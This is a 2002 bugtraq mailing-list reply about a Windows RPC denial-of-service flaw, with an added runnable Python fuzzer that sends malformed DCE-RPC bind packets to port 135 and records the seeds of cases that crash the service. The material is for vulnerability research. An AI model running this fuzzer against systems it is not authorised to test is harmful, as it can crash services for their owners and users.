[27568] in bugtraq
Re: MS WIN RPC DoS CODE FROM SPIKE v2.7
daemon@ATHENA.MIT.EDU (Dave Aitel)
Tue Oct 22 20:02:19 2002
From: Dave Aitel <dave@immunitysec.com>
To: lion <lion@cnhonker.net>
In-Reply-To: <20021022181916.16432.qmail@securityfocus.com>
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-YyZRocJYTR24bjfWxQIu"
Message-Id: <1035318066.3355.34.camel@www.immunitysec.com>
Mime-Version: 1.0
Date: 22 Oct 2002 16:21:06 -0400
There are questions about whether this vulnerability works if you have a
large enough amount of free memory. My exploit is tuned for my machine's
amount of free memory (not much), but there are variations that work on
any amount.
For those who are interested, here is my domsrpcfuzz.sh header I used to
find this attack.

MAX=35                                          # number of fuzz variables to walk
UUID=b9e79e60-3d52-11ce-aaa1-00006901293f       # interface UUID to bind to
#using incorrect versionmajor for bonus fun!
VERSIONMAJOR=2
VERSIONMINOR=2
PORT=135                                        # endpoint mapper / DCE-RPC port
TARGET=192.168.1.100
STARTFUNCTION=0                                 # first opnum to fuzz
Just copy that in, and let it run for a while. When it crashes, look at
your output file and it will have the random seed that crashed it. Then
you can do some more work to manually isolate the exact packet or
sequence that crashes it.
On Tue, 2002-10-22 at 14:25, lion wrote:
> *
> * MS WIN RPC DoS CODE FROM SPIKE v2.7
> *
-- 
Dave Aitel <dave@immunitysec.com>
Immunity, Inc
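The workflow Aitel describes, run the fuzzer, then recover the random seed of the case that killed the target from the output file and regenerate that case, depends on one property: every case must be a pure function of its seed, and the seed must be written out before the case is sent. The following is an added illustration of that property, written for this page; it is not SPIKE's code and not the domsrpcfuzz.sh script. Only the TARGET, PORT, UUID and version values are taken from the mail header; the DCE-RPC bind builder, the mutation strategy, the send_case() oracle and the fuzz() loop are this example's own assumptions about how such a harness can be structured.

```python
import hashlib
import random
import socket
import struct
import uuid

# Values copied from the domsrpcfuzz.sh header in the mail; everything else
# in this file is an assumed, example-only design (not SPIKE).
TARGET = "192.168.1.100"
PORT = 135
UUID = "b9e79e60-3d52-11ce-aaa1-00006901293f"
VERSIONMAJOR = 2            # deliberately wrong major version, as in the mail
VERSIONMINOR = 2

NDR_SYNTAX = "8a885d04-1ceb-11c9-9fe8-08002b104860"   # standard NDR transfer syntax
# Boundary integers a fuzzer typically substitutes into length/count fields.
INTERESTING = [0, 1, 0x7F, 0x80, 0xFF, 0x7FFF, 0x8000, 0xFFFF, 0x7FFFFFFF, 0xFFFFFFFF]


def build_bind(call_id=1, vmajor=VERSIONMAJOR, vminor=VERSIONMINOR,
               iface=UUID, num_ctx=1):
    """Build a well-formed DCE-RPC v5 bind PDU (little-endian NDR).

    DCE-RPC sends UUIDs with the first three fields little-endian, which is
    exactly what uuid.UUID(...).bytes_le produces.
    """
    ctx = struct.pack("<HBB", 0, 1, 0)                       # ctx id, #syntaxes, pad
    ctx += uuid.UUID(iface).bytes_le + struct.pack("<HH", vmajor, vminor)
    ctx += uuid.UUID(NDR_SYNTAX).bytes_le + struct.pack("<I", 2)
    body = struct.pack("<HHIB3x", 5840, 5840, 0, num_ctx) + ctx   # xmit, recv, assoc, #ctx
    frag_length = 16 + len(body)                             # 16-byte common header
    hdr = struct.pack("<BBBB4sHHI", 5, 0, 11, 0x03,          # vers 5.0, BIND, first|last
                      b"\x10\x00\x00\x00", frag_length, 0, call_id)
    return hdr + body


def mutate(pkt, rng):
    """Apply one seed-determined mutation to a packet.

    Either overwrite a 16- or 32-bit field at a random offset with an
    'interesting' integer (so frag_length / counts no longer match the real
    size), or append a random tail.  All randomness comes from rng, so the
    same seed always yields the same case.
    """
    buf = bytearray(pkt)
    choice = rng.randrange(3)
    if choice == 0:
        off = rng.randrange(0, len(buf) - 1)
        struct.pack_into("<H", buf, off, rng.choice(INTERESTING) & 0xFFFF)
    elif choice == 1:
        off = rng.randrange(0, len(buf) - 3)
        struct.pack_into("<I", buf, off, rng.choice(INTERESTING))
    else:
        buf += bytes(rng.randrange(256) for _ in range(rng.randrange(1, 4096)))
    return bytes(buf)


def case_for_seed(seed):
    """Regenerate the exact test case for a seed: this is what you run by
    hand once the log tells you which seed crashed the target."""
    rng = random.Random(seed)
    return mutate(build_bind(call_id=rng.randrange(1, 1 << 31)), rng)


def send_case(pkt, target=TARGET, port=PORT, timeout=3.0):
    """Deliver one case.  Returns True if the service still answers, False if
    the connection is refused or times out, which the loop treats as a crash."""
    try:
        with socket.create_connection((target, port), timeout=timeout) as s:
            s.sendall(pkt)
            s.recv(1024)
        return True
    except OSError:
        return False


def fuzz(start_seed, count, deliver=send_case, log=None):
    """Run `count` cases starting at `start_seed`.

    The seed line is written and flushed BEFORE the case is sent, so it is on
    disk even if the target (or this host) dies mid-case.  Returns the first
    seed whose case made deliver() report failure, or None.
    """
    for seed in range(start_seed, start_seed + count):
        pkt = case_for_seed(seed)
        line = f"seed={seed} len={len(pkt)} sha1={hashlib.sha1(pkt).hexdigest()}"
        if log is not None:
            log.write(line + "\n")
            log.flush()
        if not deliver(pkt):
            return seed
    return None


if __name__ == "__main__":
    with open("fuzz.log", "a") as log:
        bad = fuzz(start_seed=1, count=1000, log=log)
    print("crashed on seed", bad if bad is not None else "none")
```

Once fuzz.log names a seed, `case_for_seed(seed)` gives back the identical bytes, which is the "manually isolate the exact packet" step from the mail; bisecting between the last good and first bad seed narrows a sequence-dependent crash the same way.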